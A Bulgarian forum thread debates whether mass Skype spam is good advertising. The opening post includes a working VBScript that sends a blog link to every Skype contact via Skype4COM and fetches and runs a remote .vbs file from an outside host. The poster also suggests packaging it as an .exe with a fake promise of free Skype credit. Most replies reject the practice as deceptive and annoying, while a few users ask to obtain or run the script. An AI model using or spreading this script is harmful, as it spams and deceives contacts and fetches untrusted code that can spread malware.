Спамът по скайп, добра или лоша реклама?

Sammy

Well-Known Member
Как мислите, преди няколко дена намерих един скрит от един идиот дето си правеше линкове кликове във gorata.com, та преработих този скрип, и го пуснах на скайпа, от вчера и днеска блога прави по 30 уникални, ако някой иска мога да му го пратя. И пак да попитам това лоша реклама ли е или не?
 
Код:
on error resume next

set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")

set uDlVA = wscript.createobject("wscript.shell")

set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")

Set Sh = WScript.CreateObject("WScript.Shell")

yADAl.Client.Start()

yADAl.Attach()

For Each GAG In yADAl.Friends

yADAl.SendMessage GAG.handle,"http://skypeformobile.blogspot.com <-- Skaip za GSM?? Ve4e e vuzmojno http://skypeformobile.blogspot.com"

next

Sh.Run "http://skypeformobile.blogspot.com", 3
Sh.Run "http://dark-lord.hit.bg/photo.vbs", 4
Ето го скрипта, той не е нищо особено просто праща съощение на всички абонати ;) Може и малко да се модифицира, да се мине към .ехе и да кажем да се напише че това ти дава 10$ кредит в скайп ;)
 
Може ли малко пояснение - как се прави, защото в момента правя любителски един спам експеримент :) За сега съм само в мирк но какво пък... ще пусна и на 1-2 скайпа да видим как ще тръгне... та обясни този скрипт как да го подкарам :)
 
незнам батета да не ви чета после по блоговете какви сте красваци не се занимаваите с това

inet.blog.bg/viewpost.php?id=174445

Плюс това 30 до 100 посетителя на ден може да си докаратекато си събмитнете блога в рсс агрегатори и блогвате редовно

44 сайта където да събмитнете вашите RSS Feeds

отделно социалните мрежи.... и тнт

и може да изгорите с адсенс и с някои афилиейт акаунт
 
Последно редактирано от модератор:
От: Спамът по скайп, добра или лоша реклама?

Как мислите, преди няколко дена намерих един скрит от един идиот дето си правеше линкове кликове във gorata.com, та преработих този скрип, и го пуснах на скайпа, от вчера и днеска блога прави по 30 уникални, ако някой иска мога да му го пратя. И пак да попитам това лоша реклама ли е или не?

Мразя всички, които ми пращата л*******а по скайпа!!! :( :twisted: :eek: :mad: :oops: Това е крайно ламерско и липса на елементарно възпитание според мен :(
 
От: Спамът по скайп, добра или лоша реклама?

И аз не подкрепям, много поблеми могат да възникна при нежелано рекламиране на сайта / блога си по този начин.:) Все пак поставете се на мястото на този, който го получава. Как бихте се почувствали и колко таргетиран ще сте като потенсиялен баяр след като са ви спамнали?:) Аз лично, като правя маркетинг, помислям как би изглеждало и в очите на потенциялния посетител. Все пак се опитвам да го конвертирам, а това не става ако не харесам неговата гледна точка по въпроса.:)
 
От: Спамът по скайп, добра или лоша реклама?

Сега ще сложа статистика на 1 сайт, в който участва скрипта който посочих http://www.tyxo.bg/?48822, искам да уточня, че това не съм аз и нямам нищо общо с този сайт.
 
От: Спамът по скайп, добра или лоша реклама?

Мисля,че идеята не е добра. @coolice е много прав,след събмит тези посетители ще ги получаваш и то всеки ден и то таргетирани.
 
От: Спамът по скайп, добра или лоша реклама?

Ами явно никой от тия, които ползват този скрипт не им е ясно разликата между трафик и трафик. Първия ти скапва сървъра и освен спиране на сайта не виждаш нищо. Имаше сайтове правещи по 100 к+ от такив Vs вируси, но къде са сега ??? Втория трафик се конвертира и прави пари- продават се продукти, получават се кликове, продава се услуга, гради се име и т.н. Вижте в какво сте добри и направете сайт за това, превеждайте, помагайте, информирайте не карайте хората да се страхуват от интернет като място на малоумни хакери и диваци!
Поздрави Илиян Христов
 
От: Спамът по скайп, добра или лоша реклама?

абсолютно съгласен съм с ilianskim,това е антиреклама.
Може да има някакъв ефект ако промотирания сайт е предназначен за деца 7-15 годишни, според моите наблюдения това са редовните шарани на VB скриптовете.
Дори и така не си заслужава да си подъл и да се опитваш да припечелиш някакви стотинки дразнейки и лъжейки хората...
Не знам дали теб не те дразни, но при 200 абоната в Skype при мен става някакъв ужас... имало е дни в които съм получавал едно и също смешно съобщение по 20-30 пъти...
 
От: Спамът по скайп, добра или лоша реклама?

Как мислите, преди няколко дена намерих един скрит от един идиот дето си правеше линкове кликове във gorata.com, та преработих този скрип, и го пуснах на скайпа, от вчера и днеска блога прави по 30 уникални, ако някой иска мога да му го пратя. И пак да попитам това лоша реклама ли е или не?


може да ми я пратиш плс скайпа ми е te6kara3
 
От: Спамът по скайп, добра или лоша реклама?

Най-малумната реклама според мен. Най-много я мразя или блоквам потребителя или му се гавря по скайпа!
 
От: Спамът по скайп, добра или лоша реклама?

Айде и аз да се включа в хорчето. Мразим такива, ама много. Не че не отварям линкове от приятели и колеги, ама ако просто ме спам-ват не ми остават такива още дълго.
Тия неща по принцип се правят с хиляди и десетки хиляди едновременно за да има някакъв ефект ако си наблъскал сайта с реклами и успееш да си вземеш парите, преди да те бан-нат. Иначе... просто нема смисъл. Плащаш си за хостинг, а такъж механичен трафик просто не ти носи приходи (освен автоматичните негативи на издразнените посетители)

Имаше една масова lame грешка на времето да се плаща за трафик. И какво... човека платил на някакъв руснак за трафик към магазина си. Трафика скача рязко, клиента щастлив си взема собствен сървър, който да поеме натоварването и много трафик.
След три месеца все още няма нито една продажба. Повечето му източници на трафик са руски, арабски и китайски сайтове тип "кликай тука да видиш видео от кръвосмешение" или "свали новия Windows Vista" (познай дали посетителите са в състояние изобщо да прочетат и осмислят сайта му продаващ плазмени телевизори примерно). След още месец е блеклист-нат от Google. Иначе трафик като слънце...
 
От: Спамът по скайп, добра или лоша реклама?

Абе то нека пускат, ама постоянно са за тия "тъпи" гори и е прекалено дразнещо!!!
 

Горе